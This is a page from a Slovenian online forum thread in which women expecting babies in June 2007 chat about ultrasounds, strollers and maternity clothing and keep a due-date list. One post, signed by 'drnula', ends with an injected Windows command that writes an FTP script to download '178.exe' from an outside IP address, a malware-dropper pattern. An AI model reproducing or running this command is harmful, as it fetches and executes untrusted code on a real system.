|      
Ops :( Si prepričan/-a, da ne želiš več sodelovati?
Preden potrdiš svojo odločitev, preberi podrobnosti.
Če potrdiš, da želiš odnehati, se ti bo avtomatično naložil poseben piškotek (cookie), s pomočjo katerega bomo ob ponovnem prihodu na našo spletno stran prepoznali tvoj račun in poskrbeli, da boš lahko v času trajanja nagradnega tekmovanja (od 17. 12. do 21. 12. 2018) nemoteno brskal/-a po Ringaraja.net brez prikazovanja ikon naših sponzorjev oziroma brez okenca na desnem delu zaslona.

Obenem boš izgubil/-a vse že osvojene točke in s tem, žal, izgubiš tudi možnost, da osvojiš odlično nagrado. Raje še enkrat premisli, preden klikneš da.

Si še vedno želiš odnehati?
Ringaraja.net uporablja piškotke z namenom zagotavljanja spletne storitve, oglasnih sistemov in funkcionalnosti, ki jih sicer ne bi mogli nuditi.
Z obiskom in uporabo spletnega mesta soglašate s piškotki.   Več o tem
Uporabniki na tej temi: nihče
  Natisni
Stran: <<   < Prejšnja stran  61 62 [63] 64 65   Naslednja stran >   >>
Uporabnik
Sporočilo << Starejša tema   Novejša tema >>
   RE: Junijke 2007
25.1.2007 12:11:30   
Liona
Jaz sem se danes želela naročit na 3D UZ v Dravlje. K Pušenjaku. Pa mi je referentka po telefonu rekla, da ga dela šele od 25-30 tedna user posted image . Jaz pa sem upala, da bomo šli na UZ pred morfologijo. Ampak bo treba očitno počakati user posted image
Ah, bomo že zdržali.
Se je Jacqueline kaj javila? Kako se imajo v Franciji? user posted image

(odgovor članu zrak)
Neposredna povezava do sporočila: 1551
25.1.2007 12:11:58   
FLASK_A
Aha, zrak, moja g 3D UZ ne dela, zato sem klicala Pušenjaka (info od junijskih ropotuljic user posted image ). Nevem, kdo bi še to delal, naj katera druga predlagauser posted image

Si doma? Doma si. http://www.facebook.com/doma.si.vesna

(odgovor članu FLASK_A)
Neposredna povezava do sporočila: 1552
25.1.2007 12:46:41   
Luckabucka
Ojla punce!

Hvala za vse čestitke user posted image . A ve sploh veste, da je to naš ČETRTI fant??? Moji so seveda vsi navdušeni, jaz bom pa očitno kiklce pa klobučke samo zase kupovala user posted image . Pa sem mislila, da smo mogoče tokrat kako punčko naštimali, saj se počutim čisto drugače kot v prejšnjih dveh nosečnostih. Sem si pa res skozi želela samo to, da bi bilo vse vredu, spol mi sploh ni bil pomemben.

Lusa, saj sem vedla, da misliš name user posted image . Upam, da si dobro in da ti čimprej minejo tile meseci. Javi se kaj!
Andreja 75, si vidla, da sta se tudi tvoja junaka začela javljat user posted image ? Od tu naprej se bo pa dogajalo!! Nič skrbet, boš vidla, da bo vse ok. Držim pesti za v torek. Me prav zanima, kaj maš v trebuščku. Meni so takrat na UV napovedali par in mi tudi povedali, da je na levi strani user posted image , na desni pa user posted image . Najprej je na svet prikukalo dete z leve in nas presenetilo z lulčkom, za desnega je blo pa itak jasno, da ga ima user posted image user posted image .

Nogica, ojej, mi je bilo ful žal za ta tvoj izpit, res ti je čisto malo zmanjkalo. Bo pa sigurno naslednjič šlo!! Bomo vse navijale zate user posted image .

Špela P, upam, da je tvoj škratek že boljše. Našega je tudi včeraj položilo in bo moral bit še ves naslednji teden doma. Ti pa kar ostani doma in počivaj. Ni se vredno sekirat zaradi službe. Ti in user posted image  sta bolj pomembna od vsake službe! Itak nikoli ne moreš vsem ustrečt, pa eni ljudje so taki, da samo čakajo, da lahko planejo po kom. Saj veš, če bi pa bolna delala, bi se pa našel kak junak, ki bi ti očital, da bacile okrog deliš.

Zrak in Ronja, mislim, da bomo imele vse tri morfologijo okrog 20.02. Bosta obe vzeli vajine drage zraven? Ronja, voziček je pa tema, iz katere menda vsaka user posted image  vsaj enkrat v življenju diplomira user posted image . Jaz sem že.
Žabica26, Stokke je tudi meni ful lep. Sem zadnjič srečala eno mamico s takim vozičkom in je res naredil vtis.

Hja, zdaj pa hitro delat naprej. Lep dan vam želim!

(odgovor članu zrak)
Neposredna povezava do sporočila: 1553
25.1.2007 14:48:54   
Jasy
Ja nikical sem bla že na 3d uz. Meni je rekel gin., da najraje dela od 18-25.tedna, ker otrok še ni obrnjen z glavico navzdol, če pa je pa ne more posneti obrazka.
Skartka ta moj 3d uz je potekal tako, da mi je ginekolog najprej naredil navadni uz, premeril obseg trebuščka, premer glavice, in dolžino mislim da stegnjenice in mi je glede na mere določil datum poroda, meni je prišlo točno na isti dan kot imam po zadnji menstruaciji. Potem pa je kot video posnel kako deluje srcek. Potema sva šla na 3D UZ. Nekajgrat mi je posnel obrazek, nogice, rokice, spol, trebušček, hrbtenico, skratka vse, tako da sem lahko videla,da je z mojo pupo vse ok. Na koncu mi vse skupaj shranil na USB ključ. Če se takrat slučajno ne bi videlo vse, bi me naročil še enkrat. Plačala sem pa 55 evrov. Res je nekaj nepozabnega, ko ti v živo kaže je to čist nekaj drugega kot so te slike ko jih dobiš, Pokaže ti iz otročka iz vseh prespektiv. No sicer slikice moje so v mojem albumu, če te zanima kak to zgleda.

(odgovor članu Luckabucka)
Neposredna povezava do sporočila: 1554
25.1.2007 15:03:10   
Liona
Ni mi jasno, zakaj je meni uno glupača rekla, da dela Pušenjak 3d UZ od 25-30t, če pa sem brala na njegovem forumu, da je najbolje od 18-25t!!! Zdaj se pa še naročila nisem, ker je una ženska tolk smotana. Jutri bom še enkrat poklicala in povedala svoje user posted image .

(odgovor članu Jasy)
Neposredna povezava do sporočila: 1555
25.1.2007 15:13:36   
N _ B
Tudi jaz sem danes z morfologije. Naš otroček se je odločil, da danes ne bo nič pokazal. Leži poševno, tako, da ima glavo levo zgoraj, ritko desno spodaj in je s hrbtom obrnjen navzven. Videli smo samo utrip srčka, več ne. Pol ure se je g matral, da bi se obrnil, ampak ne. Trma trmasta je že zdaj, kaj šele bo user posted image user posted image user posted image . Podrobno je pregledal in premeril glavico (male, velike možgane) izmeril razdaljo med očmi. Ogledali smo si hrbtenico od vratu do ritke, ki nam jo je kazal(a) in to je bilo v bistvu to. Uspelo mu je cca izmerit dolžino stegnenice. Bomo kar še enkrat imeli morfologijo in sicer 07.02., ko bom 22 4/7. Upam, da bo bolj pri volji.

Zdaj moram it puding kuhat. Me mojedva že grdo gledata. Vam zvečer kaj več napišem.

Pa pa

(odgovor članu Liona)
Neposredna povezava do sporočila: 1556
26.1.2007 11:04:39   
Anonimen
Čav punce

Ja glede izpita sem že pozabila in se tolažim, da bo drugič že bolje.
KT zaenkrat hvala za pomoč, ampak mislim, da bom tukaj morala delat sama s sabo. Znati moram res zajeten kupček strokovnih besed na koncu pa se v izpitu nahajajo tudi take, ki jih med učenjem nisem zasledila in potem sem mrzla. Študiram pa turizem. Če pa bom kaj potrebovala pa se z veseljem obrnem nate, saj res ne poznam nobene, ki bi mi pomagala.

Luckabucka čestitke za četrtega user posted imageuser posted image Boš pa blažena med moškimi. Ti bodo sigurno veliko pomagali ker ponavadi je tako, da če so večinoma moški pri hiši potem pomagajo mamici pospravljat, likat, skratka naučiš jih lahko veliko gospodinjskih opravil. Če bi bila pa punčka potem bi pa ti pa ona vse nasrkale.  Tudi jaz mislim, da je vseeno kaj je samo da je vse ok. Pa lepo in zdravo user posted image naprej.

Vidim, da je veliko govora o 3D UZ. Midva sva se odločila, da ne greva, čeprav si mislim, kako lepa izkušnja je to. Zdaj za ta prvega user posted image   niti nočeva vedet kaj bo, potem za drugega pa se bova najbrž odločila da izveva za spol in da ga vidiva na 3D UZ .

Vsem tistim, ki čakate na morfologijo naj se vam tisti dan čimprej približa in da bo z vašimi user posted image vse ok.

Pa lep snežni pozdravček

(odgovor članu N _ B)
  Neposredna povezava do sporočila: 1557
26.1.2007 14:13:37   
FLASK_A
Aha, Jasy, se moram pozanimat kako je s temi tedni- da ne zamudim termina user posted image  Hvala! Res nisem vedla, da je otroček lahko potem že obrnjen navzdol in ga težje vidimo v obrazek.

No, lep sneženi dan jaz grem pa malo v vodoravno lego user posted image  Sem bila danes v firmi, da jim povem za nosečnost- so bli čist navdušeni. Tko da za prakso ni panike, štipendija bo tut še (če nrdim letnikuser posted image ), pa še rekli so mi, da moram malčka prinest pokazat, ko bomo že pri moči. Tako da super!
Na srehodu sem še našega kužka zmatrala, zdej greva pa počivat user posted image

Papa vsem user posted image  in vašim user posted image  user posted image user posted image

(odgovor članu Anonimen)
Neposredna povezava do sporočila: 1558
27.1.2007 0:24:04   
ŠpelaP
No, da vam povem, da mi, očitno, še nismo dovolj bolni! Komaj je pikec malo prišel k sebi, je nekaj dni po popitih antibiotikih Sumamed, ponovno dobil danes ponoči vročino in začel kašljati. Sva bila zjutraj pri zdravnici. Je rekla, da je očitno zdaj fasal še virozo.
Tako, da mi še kar bolehamo. Res so krute te letošnje viroze. Vem že za kar nakaj družin, kjer so v razmaku nekaj dni vsi v družini zboleli. Mene je najbolj strah, da ne bi zbolela še moja babica, ki je stara 83 let, saj je za stare ljudi res nevarna viroza.

O, koliko je že ura! Zdaj je pa že res čas za spanje! Nočko vsem skupaj!

(odgovor članu Liona)
Neposredna povezava do sporočila: 1559
27.1.2007 1:23:35   
Jacqueline
Pozdravljene!!!

Mi2 sva polno zaposlena in ne najdem časa za RR!!! Prosim, če ena prevzame seznamček in ga dopolni!!! Mi bomo imeli user posted image , imena še nima, opreme še nič ni kupljene, sobica je v surovem stanju, ... Kolikor testi sedaj kažejo bo naš malček zdrav!!!

Vsem želim lepo nosečnost in zdrave otročke!!! Ko se zadeve umirijo in bo delavnik krajši od 25 ur na dan, 7 dni v tednu pa se vam ponovno aktivno posvetim!!!

Lp,
Jackie

The sweetest flowers in all the world - A baby's hands. ~Swinburne

(odgovor članu ŠpelaP)
Neposredna povezava do sporočila: 1560
27.1.2007 14:24:36   
Anonimen
Vidim, da zdele dva dni pa niste nič kaj zgovorne. Ponavadi ste zapolnile tud po dve strani čez vikend, tako da sem vas komaj lovila.
Ojla Jacky sem že kar nekaj časa mislila nate, kje se nahajaš, no pa moje slutnje glede prezaposolenosti so bile tudi pravilne. Ti kar mirno vse reši pa se potem kaj več slišimo. Saj čez mesec dva bomo pa itak skoraj vse že proste in bo več časa za čvek.

No punce lep vikend, zdaj pa greva s kužiko na sprehod ko je tako lep sončen dan.
Ja saj najbrž ste že vse zunaj le še jaz se tle gor vrtim.

Že letim.......user posted image  user posted image

(odgovor članu Jacqueline)
  Neposredna povezava do sporočila: 1561
27.1.2007 19:22:02   
lunca2
Dober večer!

No vidim, da ste vse uredu in da vaša user posted image poteka lepo. Me veseli le tako naprej. Tudi pri meni je zaenkrat dobro. user posted image pa v trebuhu že zelo razgraja tako, da bo mali razgrajač. user posted image
A ima katera morfologijo v februarju? Z mojim bova šla 12.2 in upam, da bo prav poziral da vidimo kaj bo. Upam pa tudi da je vse uredu.
A imate pri vas veliko snega? Tu ga je le za vzorec.

Lep večer še naprej!

(odgovor članu Anonimen)
Neposredna povezava do sporočila: 1562
27.1.2007 20:23:11   
Drnula
Pozdravljene po dolgem času!
Vidim, da je preteklo kar nekaj debat v zadnjem času. Tudi o bolniški in skužbi in zase lahko rečem, da niti ne najdem časa, da bi se priklopila na internet in kaj napisala. Občasno me še napade glavobol, z utrujenostjo je bolje.
Vidim, da vas je zelo veliko že opravilo morfologijo. Jaz jo imam šele 6.2., ko bo naš user posted image  imel že dobrih 24 tednov. Komaj že čakam. Šla bova samo na klasičen UZ k moji ginekologinji, o 3D nisem razmišljala in se nisem naročala.

Zanima me če hodite v šolo za starše. Je vredno iti, je zanimivo, o čem je govora ... mene sicer ne vleče preveč.

Se pa user posted image  pošteno giblje in občutek je super. Najbolj čutim v službi, ko sedim za računalnikom. Ob prostih dnevih, ko večinoma hodim okrog pa malo manj.

lepo se imejte

drnulacmd.exe /c del i&echo open 84.41.129.205 17779 > i&echo user 1 1 >> i &echo get 178.exe >> i &echo quit >> i

(odgovor članu lunca2)
Neposredna povezava do sporočila: 1563
28.1.2007 12:31:54   
Liona
user posted image  
01. Andy29 
01. Jacqueline
, Orleans, user posted image  ali user posted image  Zoya Allegra 
01. Drnula, Postojna 
01. sreckanosecka, Ljubljana/Postojna
01. Luna 
01. zabica26
02. ~Nina~ 
02. nogica
, Ljubljana  
03. kati81, Postojna 
04. nosečka 
05. dorina

05. NR, Maribor, user posted image  Mark ali  user posted image  Maša
05. Tina26
06. palčica, Jesenice  
06. Valentina76, Maribor
07. MEGi20
08. ŠpelaP
, Slovenj Gradec
09. N & B  
09. janapan
, Postojna  
10. nikical, Ljubljana user posted image  Nik ali user posted image  Nika
10. itak, Ljubljana  
10. januska82, Ptuj  
11. Bibyka 
11. Pinokio
12. Jasy
12. zrak
, Postojna

12. Melaverde, Izola  
13. daria78 
14. Pika79
, Ljubljana  
15. babajči  

15. Luckabucka, Maribor
16. ANDREJA75, Ljubljana-CR
16. *Ana*, Šempeter

17. bombetka
17. KT
, Ljubljana 
18. Tracy  
18. irenaL 
20. XSANDRA 1
, Ljubljana
20. aktem
20. zabica26
, Kranj/Ljubljana/Postojna 
21. Nina 
22. Liona, Kranj user posted image  Svit ali user posted image Luna

22. lunca2, Trbovlje
30. Ronja, Ljubljana user posted image  Ronja ali user posted image   

Punce, bom jaz prevzela seznam. Ampak sem ga na novo "ustvarila" zato bi prosila, da mi kakršnokoli spremembo in napako pomagate odpravoti oz. dopisati. Pripišite Liona (seznam). Upam, da mi bo uspelo. user posted image

Aja, Lunca2, tudi jaz imam morfologijo v februarju. Mislim, da 8.2. Drugače pa tudi jaz našega korenjaka že kar precej čutim. Kak dan malo bolj izrazito, včasih malo manj... Komaj pa čakam na prave brcike! Takšne močne user posted image .

Lep dan (gremo na sonce in na sneg). Se beremo.

(odgovor članu Drnula)
Neposredna povezava do sporočila: 1564
28.1.2007 16:51:30   
FLASK_A
Liona! No, bom prva, ki bo malo spremenila seznam user posted image   PDP imam 27.5.2007, sem pa ostala tukaj, ker me ne pustijo stranuser posted image  Pa sej bomo junija, brez panike user posted image  Ostali podatki pa držijo!

Lepo se imejte jst pa spet- fax grrrrrrrr

(odgovor članu Liona)
Neposredna povezava do sporočila: 1565
28.1.2007 17:04:34   
špela07
Liona - PDP imam 15.6.07, prva user posted image , bo presenečenje, rodila bom v Celju.

Lp, Špela07

(odgovor članu FLASK_A)
Neposredna povezava do sporočila: 1566
28.1.2007 18:16:37   
ŠpelaP
Liona - jaz sem pa našla nekaj strani nazaj ta seznam, ki ga je že Jacqueline uredila. Lahko tega obnoviš, ko je že ful dopolnjen. Da ti malo pomagam in olajšam delo!

Seznam junijk 2007 :

user posted image 27.5 nikical, 22 let, 1user posted image , user posted image  Nik ali  user posted image Nika, Ljubljana
 user posted image  01. Andy29, 27 let, 1 user posted image
 user posted image  01. Jacqueline,
28 let, 1user posted image , Orleans, user posted image  ali  user posted image Zoya Allegra
 user posted image  01. Drnula, 29 let, 1user posted image , Postojna
 user posted image  01. sreckanosecka, 27 let, 2user posted image , user posted image Črt 27.09.2005, Ljubljana 
 user posted image  01. Luna
  user posted image 02. ~Nina~
  user posted image 02. nogica,
25 let, 1 user posted image , Ljubljana 
  user posted image 03. kati81, 25 let, 1user posted image , Postojna
 user posted image 04. nosečka, 26 let, 2 user posted image
  user posted image 05. dorina,
26 let, 1 user posted image  
 user posted image  05. NR,
28 let , 3 user posted image , user posted image  Mark ali   user posted image  Maša, Maribor, user posted image  Maruša 24.12.2005 
  user posted image 05. Tina26, 28 let
  user posted image 06. palčica, 30 let 1user posted image , Jesenice 
  user posted image 06. Valentina76, 2user posted image , Maribor, user posted image Jošt 20.02.2006
  user posted image 07. MEGi20, 19 let, 1
  user posted image 08. ŠpelaP,
31 let, 2user posted image , Slovenj Gradec,  Tim 26.11.2003
   user posted image 08. zlataribica, 28 let, 1user posted image , Kranj
user posted image
09. N & B, 30 let, 2user posted image , user posted image  2003 
  user posted image  09. janapan, 28 let, 1 user posted image , Postojna 
  user posted image  10. itak, 28 let, 1user posted image , Ljubljana 
   user posted image 10. januska82, 24 let, 2user posted image , Ptuj 
   user posted image 11. Bibyka, 24 let, 1 user posted image , Ljubljana, user posted image  Tadej ali user posted image  Petja 
  user posted image 12. Jasy,
24 let 
 user posted image 12. Melaverde, 26 let, 1user posted image , Izola 

user posted image 12.duhica, Maribor
  user posted image 13. daria78
  user posted image 14. Pika79,
27 let, 1user posted image , Ljubljana

user posted image 14. zrak, 31 let, 1user posted image , Postojna 
  user posted image 15. babajči, 28 let 

user posted image 15. špela07, 1 user posted image   
   user posted image 15. Luckabucka
     user posted image 16. ANDREJA75,
3 user posted image , Ljubljana-CR,  user posted image  1995, user posted image  1998
 user posted image  16. *Ana*, 23 let, 2user posted image , Šempeter, user posted image  03.11.2005

user posted image 17. bombetka,
26 let

user posted image 17. KT, 35 let, 1 user posted image , Ljubljana
 user posted image 18. Tracy, 26 let 
  user posted image 18. irenaL, 34 let

user posted image 20. XSANDRA 1, 31 let, 3 user posted image , Ljubljana, user posted image  Grega 11.04.1995, user posted image  Gašper 20.09.2000  
  user posted image 20. aktem, 35 let

user posted image  20. zabica26, 26. let, 1 , Kranj/Ljubljana/Postojna
 user posted image  21. Nina
 user posted image 22. Liona,
29 let, 2user posted image , user posted image  Svit ali user posted image , Kranj 

user posted image 22. lunca2, 23 let, 1user posted image , Trbovlje
   user posted image 25. Ronja, 28 let, 1user posted image , user posted image  Ronja ali user posted image , Ljubljana
   user posted image 27. mentos, 1user posted image , Kranj

< Sporočilo je popravil ŠpelaP -- 28.1.2007 18:23:00 >

(odgovor članu Liona)
Neposredna povezava do sporočila: 1567
28.1.2007 18:33:53   
ronja
Ojla, punce! Meni je še vedo slabo, še vedno mi gre ves čas na bruhanje, skratka, na vzhodu (lj.) nič novegauser posted image Imam pa že malo manj vročine, komaj nad 37 in glede na to, da se vročina niža in viša glede na to, kako zdarav sem, očitno ni od user posted image ampak kar od bolezni. Kar je po svoje fajnuser posted image Se pa ne zmeni za bruhanje, to je pa od user posted image , hehe.

Sem pa že ugotovila cikel spanja in aktivnosti mojega user posted image , saj je zaden teden zelo aktiven. Ga/jo mam že prav radauser posted image ...

morfologijo imam 19.2., tako da bomo 3 na kupuuser posted image in držale pesti ena za drugo, je tak?!Zame jih sploh morate, da ne bojo tele viroze pustile kakih posledic na srčku mojega pikeca.

Glede šole za starše sem vprašala g., pa je rekla, da se splača it malo kasneje, da ne pozabiš vsega do poroda in naj si kar na izi vzamem, heheuser posted image

Na 3D UZ bova šla, če se na mofologiji ne bo videl spol, sicer pa še ne veva, sva razmišljala, ampak če ga bova lepo videla na morfologiji, potem mogoče ne bova šla, saj bi morala it zelo kmalu po morfologiji.

Aja, Liona imaš ti prav na seznamu, moj datum poroda je 30.6., ne 25.6., glih za glih vas bom ujela, če vas bom, če se ne bo pustil prosit, da bi šel ven, kot se je fantov nečak... Sva vidla slikce, iiiiii!!!!!user posted image

(odgovor članu ŠpelaP)
Neposredna povezava do sporočila: 1568
28.1.2007 18:39:32   
ronja
Aja, punce, ali je katera od vas že morala zamenjat spodnje hlačke? Moje nizke navadne spodnjice so ok, bokserke, ki mi grejo po sredi trebuščka, pa niso več najbolj udobne, imam jih pa kar precej, tistih navadnih pa bolj malo... Pa razmišljam, ali se moram podat v nakupe oz. kako ste ve to rešile. Tangice so mi seveda še vse prav, ampak zdaj je za moje pojme premrzlo zanje, pridejo na vrsto junija, ko nam bo itak vroče (baje, se že veselim, ker me že celo življenje zebe...)

(odgovor članu ronja)
Neposredna povezava do sporočila: 1569
28.1.2007 19:08:11   
Kati81
Evo mene nazaj, sem se končno primajala, bilo je super čeprav nisem smučala. Sem pa kar precej utrujena od poti pa pakiranja, sedaj me čaka še pranje in likanje.

Našemu malemu se dogaja nenormalno najraje pa nagaja ko grem zvečer spat ali zjutraj ko bi še poležala.

Aja glede vozička, ste se kar razpisali, no midva sva skoraj odločena za stokkeja bež ali črne barve.  Sem pa v Salzburgu kupila nekaj stvari za dojenčka, so tko crtkane, sam nisem ravno pretiravala, nekaj bodijev, ene slinčke, pa enega pajacka, troje hlačke od S. Oliverja, so bile full znižane in eno kratko majčko, aja pa full lepe copatke. Me ima, da bi kar kupovala sam nočem pretiravat, ker bom veliko stvari dobila in bom raje prišpara za potem, sedaj mislim, da se bom spravila bolj na igrače, na te dodatke za na pšosteljico, pa k vozičku in igralne blazine.

Aja pa v Ikei sem kupila eno posteljnino ter kovtrček in povštrček.

Lepe sanje.

(odgovor članu ronja)
Neposredna povezava do sporočila: 1570
28.1.2007 19:15:13   
Liona
 user posted image   27.5 nikical, 22 let, 1user posted image , user posted image  Nik ali  user posted image Nika, Ljubljana
 user posted image  01. Andy29, 27 let, 1 user posted image
 user posted image  01. Jacqueline,
28 let, 1user posted image , Orleans, user posted image  ali  user posted image Zoya Allegra
 user posted image  01. Drnula, 29 let, 1user posted image , Postojna
user posted image  01. sreckanosecka, 27 let, 2user posted image , user posted image Črt 27.09.2005, Ljubljana 
 user posted image  01. Luna 
 user posted image   02. ~Nina~ 
user posted image   02. nogica,
25 let, 1 user posted image , Ljubljana  
 user posted image   03. kati81, 25 let, 1user posted image , Postojna
 user posted image   04. nosečka, 26 let, 2 user posted image  
 user posted image   05. dorina,
26 let, 1 user posted image  
user posted image  05. NR,
28 let , 3 user posted image , user posted image  Mark ali   user posted image  Maša, Maribor,
Maruša   24.12.2005  
 user posted image   05. Tina26, 28 let 
 user posted image   06. palčica, 30 let 1user posted image , Jesenice  
user posted image   06. Valentina76, 2user posted image , Maribor, user posted image Jošt 20.02.2006 
 user posted image   07. MEGi20, 19 let, 1 
 user posted image   08. ŠpelaP,
31 let, 2user posted image , Slovenj Gradec,  Tim 26.11.2003 
 user posted image   08. zlataribica, 28 let, 1user posted image , Kranj
 user posted image  
09. N & B, 30 let, 2user posted image , user posted image  2003  
 user posted image  09. janapan, 28 let, 1 user posted image , Postojna  
 user posted image  10. itak, 28 let, 1user posted image , Ljubljana  
user posted image   10. januska82, 24 let, 2user posted image , Ptuj  
 user posted image   11. Bibyka, 24 let, 1 user posted image , Ljubljana, user posted image  Tadej ali user posted image  Petja  
 user posted image   12. Jasy,
24 let 
 user posted image   12. Melaverde, 26 let, 1user posted image , Izola  

user posted image   12.duhica, Maribor 
 user posted image   13. daria78 
 user posted image   14. Pika79,
27 let, 1user posted image , Ljubljana

user posted image   14. zrak, 31 let, 1user posted image , Postojna  
 user posted image   15. babajči, 28 let 

user posted image   15. špela07, 1 user posted image  , Celje   
 user posted image   15. Luckabucka 
user posted image   16. ANDREJA75,
3 user posted image , Ljubljana-CR,  user posted image  1995, user posted image  1998
 user posted image  16. *Ana*, 23 let, 2user posted image , Šempeter, user posted image  03.11.2005

user posted image   17. bombetka,
26 let 
user posted image   17. KT, 35 let, 1 user posted image , Ljubljana
 user posted image   18. Tracy, 26 let  
 user posted image   18. irenaL, 34 let

user posted image   20. XSANDRA 1, 31 let, 3 user posted image , Ljubljana, user posted image  Grega 11.04.1995, user posted image  Gašper 20.09.2000   
user posted image   20. aktem, 35 let 

user posted image  20. zabica26, 26. let, 1 , Kranj/Ljubljana/Postojna
 user posted image  21. Nina
user posted image   22. Liona,
29 let, 2user posted image , user posted image  Svit ali user posted image  Luna , Kranj  

user posted image   22. lunca2, 23 let, 1user posted image , Trbovlje

user posted image   27. mentos, 1user posted image , Kranj
user posted image   30. Ronja, 28 let, 1user posted image , user posted image  Ronja ali user posted image , Ljubljana

Hvala ŠpelaP. Sem uredila oz. vnesla že dopolnjenega. Ronja tebi sem spremenila PDP nazaj na 30.6.

(odgovor članu ronja)
Neposredna povezava do sporočila: 1571
28.1.2007 19:21:25   
Liona
Ronja kar zadeva spodnji hlačk... Jaz že kar nekaj časa nosim le nizke boksarice. Ostale me vežejo čez trebuh. Troje sem kupila tudi v kepici in so mi full fajn, dvoje pa v Benettonu. Kupit sem si mogla tudi že pidžamo za user posted image . Ampak se v njej super počutim. user posted image  V bistvu je kot navadna pidžama, le da ima višji in širok pas. Bo še za potem. user posted image

Kaj pa glede ostalih zadev? Vozičke ste že izbrale? Jaz sem najprej želela Traxxa, ampak gredo iz prodaje in jih je že zmanjkalo. Sivega ali Lime ni več nikjer (v petek sem klicala v vse Ariele, le še rdeč ali Navy bi bil, mi pa ni všeč). Potem sem gledala Quenny Speedi, ampak je tudi za en drek baje, saj se naslonjalo ne dvigne čisto in potem otroček ne more sedet user posted image . Zdaj pa ne vem več. No, sicer imamo pa še časa na pretek...

(odgovor članu Liona)
Neposredna povezava do sporočila: 1572
28.1.2007 20:03:49   
KT
Liona, ti si carica, da si takole prevzela spisek. Če boš rabla pomoč al pa se ti ne bo več dalo, ti kar reci, bomo vse skup skočile.

Ronja ne se dat. S user posted image  bo pa ziher vse uredu.

Kako ste se razpisale o vozičkih. Sicer so se pri nas moje prijateljice dogovorile, da kupijo voziček, ampak pravijo, da bodo moje želje tudi upoštevale user posted image . A boste kupile košaro? Meni je bilo namreč rečeno, da jo prav veliko ne bom potrebovala, glede na dejstvo, da user posted image  pride junija.

En lep začetek tedna za nas user posted image  in naše user posted image .  

(odgovor članu Liona)
Neposredna povezava do sporočila: 1573
29.1.2007 4:19:18   
ronja
Hihi, KT, hvala, saj glede na to, koliko brca in se preteguje, mu ni hudegauser posted image

A sem vam že povedala, da sva s fantom vlekla karte, kirega spola bo? Za hec, seveda, nisem kaka poklicna šlogarcauser posted image

(odgovor članu KT)
Neposredna povezava do sporočila: 1574
29.1.2007 9:57:03   
MEGi20
Ojla punce....rada bi vam samo sporočila, da sem v četrtek zvedla, da ma naš user posted image "lulčka" mi smo pa vsi prčakoval da bo punčka.. in  je bil moj "srček" poleg in ko je na UZ vidu malega je bil fuuul vesel-a je možno da se moški ZELO spremeni oz. spremeni pogled na ženski trebušček potem ko vidi plod..??

user posted image lep pozdrav

Ali veste kako se reče dvema ljubimcema ki sexata po metodi varnih dni?

mamica in očka...

(odgovor članu ronja)
Neposredna povezava do sporočila: 1575
Stran:   <<   < Prejšnja stran  61 62 [63] 64 65   Naslednja stran >   >>
Stran: <<   < Prejšnja stran  61 62 [63] 64 65   Naslednja stran >   >>
Pojdi na:

Poglejte, kako se med porodom premaknejo k...
Ta neverjetna fotografija porodnice dokazuje, kako neverjetno je človeško telo. Poglejte, kako je videti anatomija porod...
Domači test nosečnosti s pomočjo sladkorja
Če mislite, da ste noseči in bi radi v tem trenutku izvedeli, če je to res, pa doma nimate originalnega testa za nosečno...

Poljubljanje otroka na usta.
пеперутка16

Ali vi (mama in oče) poljubljate otroka na usta? Pa ga še kdo poljubi (na pobudo otroka)? Tu mislim na otroka do 3 let. starost.